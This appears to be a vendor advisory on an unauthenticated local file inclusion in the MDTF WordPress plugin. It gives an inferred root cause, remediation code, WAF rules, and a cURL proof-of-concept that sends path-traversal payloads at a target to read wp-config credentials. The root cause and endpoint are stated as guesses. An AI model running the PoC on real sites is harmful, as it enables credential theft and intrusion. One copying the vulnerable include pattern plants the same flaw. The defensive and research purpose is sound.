Atomic Edge analysis of CVE-2026-54845 (metadata-based): This vulnerability allows unauthenticated local file inclusion (LFI) in the MDTF – Meta Data and Taxonomies Filter plugin for WordPress, affecting versions up to and including 1.3.8. The CVSS score is 8.1 (High); the rating reflects that an LFI in a PHP application can escalate to full server compromise. The CWE classification, CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program), points to a PHP include/require statement that accepts a user-supplied filename without proper validation.
Root Cause: The vulnerability likely stems from a dynamic include of a template or file path based on user input, such as a 'view' or 'template' parameter. WordPress plugins commonly implement filter or search functionality that loads custom display templates. If the plugin uses a statement like `include(plugin_dir_path(__FILE__) . 'templates/' . $_REQUEST['view'] . '.php');` without validation, an attacker can supply path traversal sequences (e.g. `../../../wp-config`, with the `.php` suffix appended by the code) to include files outside the templates directory. This is an inference from the CWE and the advisory description; no source code was available to confirm the exact statement or parameter name.
Exploitation: An unauthenticated attacker sends a crafted HTTP request to a vulnerable endpoint, likely an AJAX handler or a front-end script in the plugin directory; the exact handler is not confirmed by the metadata. The typical pattern is a GET or POST parameter named 'tpl', 'template', 'view' or similar, passed to the plugin's filter functionality, for example `GET /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php?tpl=../../../wp-config`. What the attacker gains depends on how the parameter reaches include(): the included file is executed, not displayed, so including wp-config.php defines the database constants on the server without echoing them back. Non-PHP files such as /etc/passwd are emitted verbatim, but only if the code does not force a .php suffix; reading PHP source requires a stream wrapper (php://filter), which only works when the parameter is not prefixed with a directory path. Remote code execution follows if attacker-controlled PHP can be placed in a file the include can reach, e.g. an upload through the WordPress media uploader, which by default requires an account with upload capability. The include itself requires no authentication.
Remediation: The plugin must validate any user-supplied input used in include/require statements. The fix should restrict included files to a predefined whitelist of allowed template names and, as defence in depth, resolve the candidate path with realpath() and verify that it falls within the templates directory. Rejecting input that contains traversal sequences is preferable to stripping them, since a single strip pass can be bypassed (e.g. `....//` becomes `../` after one removal). Version 1.3.9 likely implements such measures; confirm against the vendor changelog before relying on the version number.
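The following is an added illustration, not code from the MDTF plugin or from Atomic Edge: the include pattern inferred in the root-cause analysis above, next to a loader that applies the remediation steps (allow-list first, realpath containment as defence in depth). The function names mdtf_load_template_*, the templates/ directory layout and the 'view' values are assumptions for illustration; the demo builds its own throwaway directory so it runs offline.

```php
<?php
// Added example, not the plugin's code. mdtf_load_template_vulnerable() is the
// inferred vulnerable pattern; mdtf_load_template_safe() is the hardened form.
// Names, directory layout and template names are assumptions.

// Inferred vulnerable form: do not deploy. $view reaches include() unchanged,
// so '../secret' escapes templates/ and any .php file on disk can be executed.
function mdtf_load_template_vulnerable(string $base, string $view): void
{
    include $base . 'templates/' . $view . '.php';
}

// Hardened form. Returns true if a template was included, false if rejected.
function mdtf_load_template_safe(string $base, string $view): bool
{
    // 1. Allow-list first: only names the plugin ships may be requested, so a
    //    traversal string never touches the filesystem. This is stronger than
    //    stripping "../", which bypass strings such as "....//" survive.
    static $allowed = ['list', 'grid', 'compact'];
    if (!in_array($view, $allowed, true)) {
        return false;
    }
    // 2. Containment as defence in depth: realpath() resolves symlinks and "..",
    //    and returns false for missing files and for stream wrappers (php://).
    //    The resolved file must sit below the resolved templates directory.
    $dir  = realpath($base . 'templates');
    $path = realpath($base . 'templates/' . $view . '.php');
    if ($dir === false || $path === false
        || strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Demo on a throwaway directory layout (constructed for this example):
//   <tmp>/mdtf-demo-<pid>/templates/list.php   legitimate template
//   <tmp>/mdtf-demo-<pid>/secret.php           a file outside templates/
$base = sys_get_temp_dir() . '/mdtf-demo-' . getmypid() . '/';
mkdir($base . 'templates', 0700, true);
file_put_contents($base . 'templates/list.php', '<?php echo "list template\n";');
file_put_contents($base . 'secret.php', '<?php echo "secret.php executed: escaped templates/\n";');

echo "vulnerable loader, view='../secret': ";
mdtf_load_template_vulnerable($base, '../secret');   // prints the escape message

$probes = ['list', '../secret', 'list/../../secret', '../../../wp-config'];
foreach ($probes as $p) {
    printf("hardened loader, view='%s': ", $p);
    if (!mdtf_load_template_safe($base, $p)) {       // only 'list' is included
        echo "rejected\n";
    }
}

// Clean up the demo files.
unlink($base . 'templates/list.php');
unlink($base . 'secret.php');
rmdir($base . 'templates');
rmdir($base);
```

The allow-list alone is what stops every probe here; the realpath check is kept because it also defends against a future template name that contains a separator, a symlink planted inside templates/, or a wrapper string, all of which fail the containment test.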
Impact: Successful exploitation allows an attacker to include arbitrary server files, disclosing their content where the file is emitted rather than executed (database credentials, salts and keys from wp-config.php where source disclosure is achievable) and executing arbitrary PHP where attacker-controlled content can be placed on disk. This leads to complete site compromise: privilege escalation, data theft, malware injection and full server takeover. Atomic Edge research assesses this vulnerability as critical due to the unauthenticated access vector and the high privilege escalation potential.
Below is our ModSecurity-compatible rule set to protect against this particular CVE. The rules are scoped to the plugin's index.php; if the vulnerable handler turns out to be admin-ajax.php or another entry point, the REQUEST_URI condition must be re-scoped or the rules will never fire.
# Atomic Edge WAF Rule - CVE-2026-54845 (metadata-based)
# Blocks local file inclusion attempts via the MDTF plugin by matching
# path traversal sequences and stream wrappers in template/view parameters
# on plugin endpoints. Rules are narrowly scoped to the vulnerable plugin
# directory.
#
# Matching notes: the engine URL-decodes ARGS once when it parses the
# request, so the explicit t:urlDecode is a second pass that catches
# double-encoded payloads (%252e%252e%252f). The dots in the traversal
# pattern are escaped: an unescaped "../" matches any two characters
# followed by a slash. Do not add t:normalizePath, which would resolve
# the ".." away before the pattern sees it. Each chain is two rules only;
# a further chained rule requiring "../" would let wrapper-only payloads
# such as php://filter through, because every link in a chain must match.
# Rule 1: Block path traversal / wrappers in 'tpl' parameter on plugin index.php
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index\.php" \
    "id:20261994,phase:2,deny,status:403,log,chain,msg:'CVE-2026-54845 - LFI attempt via tpl parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
    SecRule ARGS:tpl "@rx \.\./|file://|php://|expect://" "t:urlDecode,t:lowercase"
# Rule 2: Block path traversal / wrappers in 'template' parameter
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index\.php" \
    "id:20261995,phase:2,deny,status:403,log,chain,msg:'CVE-2026-54845 - LFI attempt via template parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
    SecRule ARGS:template "@rx \.\./|file://|php://|expect://" "t:urlDecode,t:lowercase"
# Rule 3: Block path traversal / wrappers in 'view' parameter
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index\.php" \
    "id:20261996,phase:2,deny,status:403,log,chain,msg:'CVE-2026-54845 - LFI attempt via view parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
    SecRule ARGS:view "@rx \.\./|file://|php://|expect://" "t:urlDecode,t:lowercase"
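The following is an added example, not part of the Atomic Edge rule set: it replays the matching logic of the rules above in plain PHP against constructed requests, so the endpoint scoping, the decode order and the escaped traversal pattern can be checked offline without a ModSecurity instance. The sample requests are constructed for this demo, and waf_would_block() is a helper written for it.

```php
<?php
// Added example: a stand-alone model of the rules above. Sample requests below
// are constructed; waf_would_block() is not a ModSecurity API.

const PLUGIN_ENDPOINT = '#/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index\.php#';
const LFI_PATTERN     = '#\.\./|file://|php://|expect://#';
const WATCHED_ARGS    = ['tpl', 'template', 'view'];

// Returns the name of the first watched argument that would trip the rule,
// or null if the request passes. Mirrors phase:2 (query string and POST body
// both visible) and the t:urlDecode,t:lowercase transformation chain.
function waf_would_block(string $method, string $uri, string $body = ''): ?string
{
    $path = (string) parse_url($uri, PHP_URL_PATH);
    if (!preg_match(PLUGIN_ENDPOINT, $path)) {
        return null;    // rules are scoped to the plugin's index.php only
    }
    // The engine URL-decodes ARGS once while parsing; parse_str() does the same.
    $args = [];
    parse_str((string) parse_url($uri, PHP_URL_QUERY), $args);
    if ($method === 'POST') {
        $post = [];
        parse_str($body, $post);
        $args = array_merge($args, $post);
    }
    foreach (WATCHED_ARGS as $name) {
        if (!isset($args[$name]) || !is_string($args[$name])) {
            continue;
        }
        // t:urlDecode is a second decode here (catches %252e%252e%252f);
        // t:lowercase makes the wrapper names case-insensitive.
        $value = strtolower(urldecode($args[$name]));
        if (preg_match(LFI_PATTERN, $value)) {
            return $name;
        }
    }
    return null;
}

$plugin  = '/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php';
$samples = [
    ['GET',  $plugin . '?tpl=../../../wp-config', ''],                    // plain traversal
    ['GET',  $plugin . '?view=%252e%252e%252fwp-config', ''],            // double-encoded traversal
    ['GET',  $plugin . '?template=PHP://filter/resource=wp-config', ''], // wrapper with no "../"
    ['POST', $plugin, 'tpl=..%2F..%2Fwp-config'],                        // traversal in the body
    ['GET',  $plugin . '?tpl=ab/list', ''],                              // benign; an unescaped "../" would match
    ['GET',  '/wp-admin/admin-ajax.php?tpl=../../../wp-config', ''],     // outside the rules' scope
];
foreach ($samples as [$method, $uri, $body]) {
    $hit = waf_would_block($method, $uri, $body);
    printf("%-4s %-72s -> %s\n", $method,
        $uri . ($body !== '' ? " [body: $body]" : ''),
        $hit === null ? 'pass' : "block (arg '$hit')");
}
```

The last sample is the practical caveat: a request carrying the same payload to admin-ajax.php passes untouched, which is the expected behaviour of rules scoped to the plugin's index.php and the reason the scope must be revisited once the real handler is known.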
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-54845 - MDTF – Meta Data and Taxonomies Filter <= 1.3.8 - Unauthenticated Local File Inclusion
// This PoC demonstrates how an unauthenticated attacker can include arbitrary files
// by manipulating a template/view parameter in the plugin's front-end script.
// Configurable target
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// The file to include. Path traversal sequences walk from the plugin directory
// (wp-content/plugins/<plugin>/) up to the WordPress root. The default omits
// the .php extension on the assumption that the vulnerable include() appends
// it; if it does not, append '.php' here or target a non-PHP file such as
// /etc/passwd, which include() emits verbatim.
// Note: include() executes PHP files rather than displaying them. Including
// wp-config.php defines the database constants server-side but prints nothing,
// so the credential markers below only appear if source disclosure is possible
// (e.g. a php://filter wrapper, which needs an unprefixed parameter) or if the
// included file is not PHP.
$file_to_read = '../../../wp-config';

// Construct the exploit URLs. Based on common WordPress plugin patterns the
// parameter might be 'tpl', 'template', 'view' or 'file'; the exact handler and
// parameter name are not confirmed without source access, so several are tried
// against the plugin's index.php.
$plugin_index = '/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php';
$endpoints = [];
foreach (['tpl', 'template', 'view'] as $param) {
    $endpoints[] = $plugin_index . '?' . $param . '=' . rawurlencode($file_to_read);
}

// Markers that indicate the response carries file content rather than the
// plugin's normal output. The literal string 'wp-config' is deliberately not a
// marker: a PHP warning for a failed include contains it and would be a false
// positive.
$markers = ['DB_NAME', 'DB_USER', 'DB_PASSWORD', 'AUTH_KEY', 'root:x:0:0'];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // lab targets often use self-signed certificates
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$found = false;
foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    echo "[*] Trying: $url\n";
    curl_setopt($ch, CURLOPT_URL, $url);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($response === false) {
        echo "[!] cURL error: " . curl_error($ch) . "\n";
        continue;
    }
    // A 200 is not proof of inclusion: a failed include() only raises a PHP
    // warning, which production sites usually suppress, and the page renders
    // normally. Look for content that can only come from the included file.
    if ($http_code == 200 && !empty($response)) {
        $matched = null;
        foreach ($markers as $marker) {
            if (strpos($response, $marker) !== false) {
                $matched = $marker;
                break;
            }
        }
        if ($matched !== null) {
            echo "[+] SUCCESS! Marker '$matched' found via endpoint: $endpoint\n";
            echo "[+] Response snippet:\n" . substr($response, 0, 2000) . "\n";
            $found = true;
            break;
        }
        echo "[*] HTTP 200 but no file-content marker detected; the include may have executed silently or failed.\n";
        echo "[*] Response preview: " . substr($response, 0, 500) . "\n";
    } else {
        echo "[!] HTTP status: $http_code - endpoint may not exist or is blocked.\n";
    }
}
curl_close($ch);

if (!$found) {
    echo "[-] No vulnerable endpoint found with these payloads. The plugin may be patched, or the parameter name differs.\n";
    echo "[-] Try changing the file name or probing other parameters like 'file', 'page', 'include'.\n";
}

// Note: This PoC assumes the vulnerable parameter and endpoint. Actual exploitation
// may require brute-forcing parameters or discovering the exact vulnerable handler.
// Atomic Edge research recommends using this script as a starting point for manual testing.